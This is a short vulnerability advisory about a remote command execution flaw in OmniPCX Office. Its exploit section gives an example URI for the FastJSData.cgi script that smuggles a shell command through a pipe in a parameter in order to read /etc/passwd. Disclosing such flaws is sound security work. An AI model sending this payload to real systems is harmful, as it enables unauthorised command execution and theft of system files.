• info
• discussion
• exploit
• solution
• references

OmniPCX Office Remote Command Execution Vulnerability

Attackers would likely use readily available tools to exploit this issue.

The following example URI is available:

http://www.example.com/cgi-data/FastJSData.cgi?id1=sh2kerr&id2=91|cat%20/etc/passwd